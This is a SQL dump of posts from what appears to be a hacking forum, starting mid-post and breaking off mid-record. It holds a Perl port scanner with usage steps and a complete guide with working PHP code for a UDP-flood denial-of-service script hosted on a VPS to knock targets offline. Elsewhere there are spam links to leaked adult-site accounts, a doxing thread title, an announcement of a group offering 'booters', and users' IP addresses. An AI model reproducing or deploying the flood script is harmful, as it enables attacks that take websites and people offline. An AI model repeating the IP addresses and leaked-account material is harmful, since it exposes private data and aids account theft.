Disturbed_1 = = = = Team Sp0il = = = = Sp0il.com = = = ================================================= }; use IO::Socket; print \"Target: \"; chop ($target = <stdin>); print \"Min Port: \"; chop ($port = <stdin>); print \"Max Port: \"; chop ($maxport = <stdin>); my ( $daddr ); { $daddr = inet_aton($target) || die(\"Failed to locate target host: $target\"); print \" ================================================================\\n\"; print \" Scanning $target on ports $port-$maxport\\n\"; print \" This might take a while depending on how many ports you have\\n\"; print \" ================================================================\\n\"; foreach (; $port<=$maxport; $port++) { print \"\\n == Scanning port $port ==\"; if( IO::Socket::INET->new(PeerAddr=>\"$target:$port\",Proto=>\'tcp\',Timeout=>1)) { print \"\\n==== Port $port is open ====\\n\" ; } else{ print \"\\nPort $port is NOT open\\n\"; } } } print \"\\n\\n\\nFinished Scanning $target up to port $maxport\\n\\n\"; print \"\\n Thanks for using my port scanner\\n\"; print \"\\n - Disturbed_1\"; exit (0); -------------------------------------------------------------------------------------------------------------------------------------- First copy the script and save it as pscan.pl in the c:/perl/bin/ Directory... Now open up Command Prompt and type: Code: \"cd ..\\..\\perl\\bin Now type: \"pscan.pl\" Now type in a host (URL) Then type in the starting port I am using 21(FTP port) Now you must type the ending port I will use 80(Public Port) Now scan... Now you wait... After is scans ports 21-80 Your window should look like Now if you look back you can see which ports are opened and which are closed... Closed: Code: Port # is NOT open Open: Code: ==== Port # is open ==== Scanning: Code: == Scanning port # == So if you look through the commands these ports are open... Code: 21 25 26 53 80 -------------------------------------------------------------------------------------------------------------------------------------- Hope this was helpful to some of you~ Enjoy~', '72.231.24.165', '1223104677', '1', '0', '0', '0', '1', '868b7434897d63384be3fcadafadfda8', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('5650', '999', '0', '67', '[Guide] How To Setup A PHP DoS (Shell) Script', '0', '5', 'Timmy', '1350703914', 'UDP flood php scripts can be extremely strong, the strength of it depends on the strength of the server which it is hosted on. These can easily take down small websites/forums by using a UDP flood php script hosted off a $10 a month unmetered bandwidth Linux vps. The vps can be purchased at http://turbovps.com/en/VPS/Linux-Unmetered-VPS (Buy the $15.00 vps) You will need: Linux Vps (Ubuntu OS) FileZilla ftp client Putty - First connect to your vps via ssh through putty. Than login to your vps. Navigate to this location /etc/apt/sources.list Add these lines to it and click save. deb http://us.archive.ubuntu.com/ubuntu dapper universe main restricted universe deb http://security.ubuntu.com/ubuntu dapper-security universe Replace \"Dapper\" with your ubuntu version ex. Jaunty_9.04 , Karmic_9.10, Intrepid_8.10 etc Then enter your terminal and type sudo apt-get update Now for actually installing it. Enter your terminal again and type the following in order. sudo apt-get install apache2 sudo apt-get install php5 sudo apt-get install libapache2-mod-php5 sudo /etc/init.d/apache2 restart Now take this script below and paste it into a notepad file and save it as shell.php. [code] <html> <body> <center> <font color=\"00FF00\"> <pre> __ _ _ _ / ____| | | | | (___ | |__ ___| | | \\___ \\| \'_ \\ / _ \\ | | __ _) | | | | __/ | | __/|_| |_|\\___|_|_| </pre> <STYLE> input{ background-color: #00FF00; font-size: 8pt; color: #00; font-family: Tahoma; border: 1 solid #66; } button{ background-color: #00FF00; font-size: 8pt; color: #00; font-family: Tahoma; border: 1 solid #66; } body { background-color: #00; } </style> <?php //UDP if(isset($_GET[\'host\'])&&isset($_GET[\'time\'])){ $packets = 0; ignore_user_abort(TRUE); set_time_limit(0); $exec_time = $_GET[\'time\']; $time = time(); //print \"Started: \".time(\'d-m-y h:i:s\').\"<br>\"; $max_time = $time+$exec_time; $host = $_GET[\'host\']; for($i=0;$i<65000;$i++){ $out .= \'X\'; } while(1){ $packets++; if(time() > $max_time){ break; } $rand = rand(1,65000); $fp = fsockopen(\'udp://\'.$host, $rand, $errno, $errstr, 5); if($fp){ fwrite($fp, $out); fclose($fp); } } echo \"<br><b>UDP Flood</b><br>Completed with $packets (\" . round(($packets*65)/1024, 2) . \" MB) packets averaging \". round($packets/$exec_time, 2) . \" packets per second \\n\"; echo \'<br><br> <form action=\"\'.$surl.\'\" method=GET> <input type=\"hidden\" name=\"act\" value=\"phptools\"> Host: <br><input type=text name=host><br> Length (seconds): <br><input type=text name=time><br> <input type=submit value=Go></form>\'; }else{ echo \'<br><b>UDP Flood</b><br> <form action=? method=GET> <input type=\"hidden\" name=\"act\" value=\"phptools\"> Host: <br><input type=text name=host value=><br> Length (seconds): <br><input type=text name=time value=><br><br> <input type=submit value=Go></form>\'; } ?> </center> </body> </html> [/code] Now open FileZilla and connect to your vps and upload the shell.php file to your /var/www/ directory. Than access it via web, type in the IP at the top, and time-in-seconds to disconnect them at the bottom, click go and your target is now disconnected. - Hope this helped. If you have any questions feel free to post them.', '72.231.24.165', '1223104677', '1', '0', '5', '1350703981', '1', '79786de018f7caa955fd2d6e05e634d1', '0', '1350703981'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('5651', '964', '5433', '19', 'RE: [UPDATED] L33T Hacking Skype Resolver', '0', '100', '??zg???g????61', '1350704021', ':D awesome this works, thanks Rave.', '65.96.215.138', '1096865674', '1', '0', '0', '0', '1', '3647294ccb8780a506989e8f723f5f71', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('5652', '997', '5646', '14', 'RE: Discovery Channel - Track Me If You Can 2010', '0', '2', 'Apathy', '1350704219', 'Sounds cool I might check it out.', '173.206.138.180', '-1378973004', '0', '0', '0', '0', '1', '1b8341ddb42b1f2938428abb07d2ccfe', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('5653', '990', '5640', '12', 'RE: How to send free anonymous SMS to your friends mobile phone from you\'re PC', '0', '100', '??zg???g????61', '1350704257', '[quote=\'VirtualLegend\' pid=\'5640\' dateline=\'1350697903\'] Why do you copy and past? http://techotoys.net/2011/07/how-to-send-free-anonymous-fake-sms-to-friends-number.html [/quote] Lol busted...', '65.96.215.138', '1096865674', '1', '0', '0', '0', '1', '2e6e2cf3d54c94c3c65d2ca93d9541fb', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('5654', '1000', '0', '3', 'Congrats NXK and ??????????¢™', '0', '222', 'Exposé', '1350705335', 'Just noticed that NXK has been promoted to admin and ??????????¢™ is now supermod. Hopefully this is a great staff change and is a positive change for the site. I think it is.... congrats again :D', '74.76.76.132', '1246514308', '1', '0', '222', '1350705418', '1', 'a223f95dbbec76346e76b074c1538eb7', '0', '1350705418'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('5655', '1000', '5654', '3', 'RE: Congrats NXK and ??????????¢™', '0', '3', '??????????¢™', '1350705436', 'Thanks, I really appreciate it.', '75.22.48.43', '1259745323', '1', '0', '0', '0', '1', 'e6baeef50c9fbdc877b50a65aa7f6ce3', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('5656', '774', '3992', '19', '[Junk]What is expected of you!', '0', '1', 't3h jok3r', '1350705866', 'This thread has been junked.', '72.231.24.165', '1223104677', '1', '0', '0', '0', '1', '', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('5657', '985', '5548', '7', 'RE: World\'s Longest Email Address', '0', '205', 'mothered', '1350706587', '[quote=\'XTr3ME PiX3L\' pid=\'5548\' dateline=\'1350631058\'] I don\'t see the point in it , this can\'t annoy anyone people just copy and paste so its not like someone\'s gonna bother reading all that Though u can troll people with it.. [/quote] Just like ??????????¢™ mentioned above, It\'s more so the reaction on people once they see It, and not whether a given person tries to read It.', '210.50.40.19', '-768464877', '1', '0', '0', '0', '1', '6487ef4febdf23cc9efae478250b8418', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('5658', '1000', '5654', '3', 'RE: Congrats NXK and ??????????¢™', '0', '205', 'mothered', '1350706714', 'Well done boys, congratulations to you both :)', '210.50.40.19', '-768464877', '1', '0', '0', '0', '1', '01b3724ef8e33ed970a926a629d50830', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('5659', '1000', '5654', '3', 'RE: Congrats NXK and ??????????¢™', '0', '2', 'Apathy', '1350706816', 'Congrats. I am taking a break atm.', '173.206.138.180', '-1378973004', '0', '0', '0', '0', '1', 'a4a405e1431143075c0c3ec7ba336e41', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('5660', '1001', '0', '7', 'Shady URL', '0', '205', 'mothered', '1350707012', 'Greetz to all, I came across this on another forum, so I don\'t take credit In finding It myself. Basically you can make a URL of choice, look suspicious and frightening. Try It for yourself, It\'s quite cool. Link: http://www.shadyurl.com/index.php', '210.50.40.19', '-768464877', '1', '0', '0', '0', '1', '10b9b26ed166c9fd762fd730e721a725', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('5661', '1001', '5660', '7', 'RE: Shady URL', '0', '2', 'Apathy', '1350707126', 'http://5z8.info/dogporn_v8y0iy_startdownload Your welcome.', '173.206.138.180', '-1378973004', '0', '0', '0', '0', '1', '68298811220b917c3dd0861fd78a135f', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('5662', '1001', '5660', '7', 'RE: Shady URL', '0', '222', 'Exposé', '1350707139', 'Lmao Jok3r rename the site to this bro....rofl http://5z8.info/myspace-of-sex_c4j1xo_foreign-brides (redirects to L33thacking) Nice share mothered :P', '74.76.76.132', '1246514308', '1', '0', '222', '1350707171', '1', '1388456df80d777cfbe57ab1f98ba309', '0', '1350707171'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('5663', '993', '5595', '12', 'RE: Most complete guide to be anonymous', '0', '205', 'mothered', '1350707173', 'No replies? Amazing thread. Bookmarked. Thanks mate.', '210.50.40.19', '-768464877', '1', '0', '0', '0', '1', 'c332ce088160ef868c44b99fb3b27731', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('5664', '878', '4748', '16', 'RE: ƒ???????????g\'s Dell SE Method....', '0', '222', 'Exposé', '1350707295', 'Yeh sure lol...I\'ll send it when I have a chance', '74.76.76.132', '1246514308', '1', '0', '0', '0', '1', '7c3429ad0ecb6d496d567ac4d42a8a61', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('5665', '990', '5545', '12', 'RE: How to send free anonymous SMS to your friends mobile phone from you\'re PC', '0', '205', 'mothered', '1350707300', 'If not written by yourself, you definitely must credit your sources.', '210.50.40.19', '-768464877', '1', '0', '0', '0', '1', '27c3a58f760ce6cc8883a7351b6f4ac7', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('5666', '1002', '0', '3', 'New mods and forum updates', '0', '1', 't3h jok3r', '1350707318', 'Firstly, Congratulations to NXK for becoming the new Admin and ??????????¢™ the new Staff member. Apathy is now a Staff member. We need one mod, we will be posting applications or do a community vote very soon. Fearless Group has been deleted upon leaders request and the RATTERs group has changed to DDoSers. Sounds skiddy but there you will get access to booters, source, tutorial on creating DoSers etc. The PIDs and Movie Rips section is now public but you are required a password. In order to get a password, make sure you have 35 posts or more then PM ??????????¢™ requesting the password. Save it in your notepad and please do not give the password out to anyone. For the new theme, I have decided to stay back on the current theme and make some changes to the theme. [b]POST HERE AND PM ME[/b] :- Post here and PM me is not allowed on LH. Due to the problems we are having with AF, we are allowing Post here and PM me for a [u]week only[/u] so they don\'t leech our content. We have also beat our previous months posting record. Thanks for contributing. [spoiler][IMG]http://imageshack.us/a/img593/1364/statsij.png[/IMG][/spoiler] We have updated our rules help document which can be viewed [url=http://l33thacking.net/misc.php?action=help&hid=8]here[/url] Forum games has a new rule, check the forum for the new rule. Hope you like the updates. **Bonus: https://sphotos-b.xx.fbcdn.net/hphotos-snc6/10449_158917320918415_1748190171_n.jpg Thanks for ??????????¢™ for the picture. For a laugh check it out.', '72.231.24.165', '1223104677', '1', '0', '1', '1350790141', '1', 'ace099e83d9e07631b94758e0ae8158e', '0', '1350790141'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('5667', '1002', '5666', '3', 'RE: New mods and forum updates', '0', '222', 'Exposé', '1350707472', 'Thanks for the updates Jok3r. And I would like to help in getting the theme situated. I think all we need is a new header/logo and we will be all set. And congrats to all new staff members :D', '74.76.76.132', '1246514308', '1', '0', '0', '0', '1', '72b5f27ce831eefeac277a4fd5b2179f', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('5668', '1003', '0', '54', '[20 Oct ] Premium Elite XXX Passes, All Checked And Working!!!', '0', '255', 'sbhshroy2', '1350708264', 'click here http://adf.ly/DrLBX', '112.110.9.92', '1886259548', '0', '0', '0', '0', '1', 'cc1a1027c299a592ca0056755668c798', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('5669', '1002', '5666', '3', 'RE: New mods and forum updates', '0', '3', '??????????¢™', '1350708319', 'Thanks for the updates and thanks for informing everyone.', '75.22.48.43', '1259745323', '1', '0', '0', '0', '1', '920b70d570ddeafd72c1ea11e1ee35c8', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('5670', '1004', '0', '54', '[20 OKT]Brazzers,Bangbros,RK,...and more,all checked and working.', '17', '255', 'sbhshroy2', '1350708713', 'click here http://adf.ly/DrLfN', '112.110.9.92', '1886259548', '0', '0', '0', '0', '1', '0eb8b3c94e4f4490dc9196ff6a21fc44', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('5671', '1001', '5660', '7', 'RE: Shady URL', '0', '3', '??????????¢™', '1350708827', 'LOL this is so funny, Nice share mothered.', '75.22.48.43', '1259745323', '1', '0', '0', '0', '1', '1272667da23d0857c1173366ca7c177a', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('5672', '1005', '0', '54', '[20 oct] realitykings,ma.brazzers and many more active acounts for 20 oct. 2012', '17', '255', 'sbhshroy2', '1350709115', 'click here http://adf.ly/DrM5O', '112.110.9.92', '1886259548', '0', '0', '0', '0', '1', '8a93548582e7e2ec620556024fdcd472', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('5673', '906', '5575', '42', 'RE: DOX of Kody Maxson', '0', '1', 't3h jok3r', '1350709122', '[quote=\'sirchamp\' pid=\'5575\' dateline=\'1350640448\'] Beeing banned of HF must be really fucked up. [/quote] Actually it\'s good to be away from skids.', '72.231.24.165', '1223104677', '1', '0', '0', '0', '1', '54bcc4028627bdd1d93292653458fc9f', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('5674', '1002', '5666', '3', 'RE: New mods and forum updates', '0', '9', 'p420', '1350709214', 'Nice updates. I try to come online but can\'t sometimes.', '72.231.24.165', '1223104677', '0', '0', '0', '0', '1', '393ed1cf6344a61da1e31739fc948229', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('5675', '906', '5576', '42', 'RE: DOX of Kody Maxson', '0', '9', 'p420', '1350709260', '[quote=\'R?????zo?\' pid=\'5576\' dateline=\'1350641378\'] My thread gets deleted on HF, i think they don\'t allow Dox [/quote] Yeah they don\'t allow DOX infos.', '72.231.24.165', '1223104677', '0', '0', '0', '0', '1', 'e918a36e901e495209092520a52f5174', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('5623', '896', '5499', '23', 'RE: How to secure your Router', '0', '264', 'D?ea', '1350677402', '[quote=\'ƒ???????????g\' pid=\'5499\' dateline=\'1350608178\'] Lmao I could still hack your router but k...:P [/quote] How would you do that? - Without getting me to visit a website or open a program.', '87.55.196.22', '1463272470', '1', '0', '0', '0', '1', '9021b0927eaa54055903fc9975204c1d', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('5624', '889', '4842', '3', 'RE: Vote for a new theme', '0', '257', 'XxTREYZxX', '1350677643', 'yeah this theme is fine, but then again we need a change every now and then>', '203.104.11.43', '-882373845', '1', '0', '0', '0', '1', '282bf95d3bbc4d8aa296af80b0b6470b', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('5625', '690', '3516', '69', 'RE: What are your fav or which coding languages do you know?', '0', '257', 'XxTREYZxX', '1350678095', 'this is all i know HTML, CSS, and Java.', '203.104.11.43', '-882373845', '1', '0', '0', '0', '1', 'f555d300dfd31c0f5f46d1f07ba8e455', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('5626', '985', '5554', '7', 'RE: World\'s Longest Email Address', '0', '257', 'XxTREYZxX', '1350678781', '[quote=\'R?????zo?\' pid=\'5554\' dateline=\'1350632999\'] Hahah I\'ve heard of this before but I never thought of actually using it haha Like doing buisness, \'whats your paypal?\' Here you go: \'hauabaf@abcdefghijklmnopqrstuvwxyzabcdefghijklmnopqrstuvwxyzabcdefghijk.com\' haha [/quote] bahaha yeah that would be funny as', '203.104.11.43', '-882373845', '1', '0', '0', '0', '1', '708cb8ff15ddd8286ce4977e3ede5cbb', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('5627', '990', '5545', '12', 'RE: How to send free anonymous SMS to your friends mobile phone from you\'re PC', '0', '257', 'XxTREYZxX', '1350679055', 'umm your name is not delta force *facepalm ahah lol back to topic thanks for the great share', '203.104.11.43', '-882373845', '1', '0', '0', '0', '1', '0a784afce56b6b46bf396f9cd9ec88b6', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('5676', '1006', '0', '54', 'playboy premium acount for lifetime', '17', '255', 'sbhshroy2', '1350709799', 'click here http://adf.ly/DrMx1', '112.110.9.92', '1886259548', '0', '0', '0', '0', '1', 'd25532ee24431318b996db82a36a5698', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('5677', '896', '4892', '23', 'RE: How to secure your Router', '0', '222', 'Exposé', '1350710086', 'Why do I need you to visit anything....? I can use a couple of programs that I have lmao', '74.76.76.132', '1246514308', '1', '0', '0', '0', '1', '7ff4ae4fe00d5bbfe2eb0e625445e308', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('5678', '1007', '0', '54', 'uncommonporn premium acounts', '0', '255', 'sbhshroy2', '1350710106', 'click here http://adf.ly/DrNWp', '112.110.9.92', '1886259548', '0', '0', '0', '0', '1', 'cb8c0b384a163517f2500a13632369f0', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('5679', '990', '5545', '12', 'RE: How to send free anonymous SMS to your friends mobile phone from you\'re PC', '0', '258', 'PiXEL^OG', '1350710838', 'WTF im Deltaforce from Ubers , I wrote this like a year ago on ubers some fucking skid must have leeched it to techotoys.net', '139.190.235.246', '-1950422026', '0', '0', '0', '0', '1', '200cddf155f9ad885b686399eb474bb6', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('5680', '1002', '5674', '3', 'RE: New mods and forum updates', '0', '3', '??????????¢™', '1350710866', '[quote=\'p420\' pid=\'5674\' dateline=\'1350709214\'] Nice updates. I try to come online but can\'t sometimes. [/quote] Its okay, we understand people may have trouble at home or whatever the case may be so we really dont panic or whatever. The only time is if you are a staff or an admin.', '75.22.48.43', '1259745323', '1', '0', '0', '0', '1', 'e81653d9e651396119da2de0a972e95a', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('5681', '987', '5542', '13', 'RE: [TUT] Using Metasploit to harvest all emails of a website', '0', '258', 'PiXEL^OG', '1350710879', 'I will soon , i might even become more active here :D', '139.190.235.246', '-1950422026', '0', '0', '0', '0', '1', '8f6729b1f7f02a9fafbf2f0010218bb7', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('5682', '947', '5329', '8', 'RE: GANGNAM STYLE', '0', '222', 'Exposé', '1350711147', 'God I absolutely hate this dam song....it just pisses me off. IDK WHY', '74.76.76.132', '1246514308', '1', '0', '0', '0', '1', 'fce4277794d63e13e3170431f66ffb76', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('5683', '609', '2944', '58', 'RE: Gamers Recruitment', '0', '258', 'PiXEL^OG', '1350713685', 'Username : XTr3ME PiX3L Name : Classified Age : 15 Profile : http://l33thacking.net/user-258.html Why I should join Gamers : Because i own the PS3 Xbox 360 and a PSP Vita. I also play on PC when playing an older game or CS:GO. I have been gaming for almost 8 years since i was 9. I have a Modded xbox 360 so i don\'t buy games , i download but if there is a game i really want then i buy it to support the developers. So yeah i play alot lol', '139.190.235.246', '-1950422026', '0', '0', '0', '0', '1', 'fe30e9b38b389387baaf1285815462d6', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('5684', '993', '5595', '12', 'RE: Most complete guide to be anonymous', '0', '62', 'R?????zo?', '1350723976', 'Thanks, i take no credits though. Just sharing :)', '46.189.139.54', '784173878', '1', '0', '0', '0', '1', 'c48e5a6a624ff1436c48c307489e198c', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('5685', '1001', '5660', '7', 'RE: Shady URL', '0', '62', 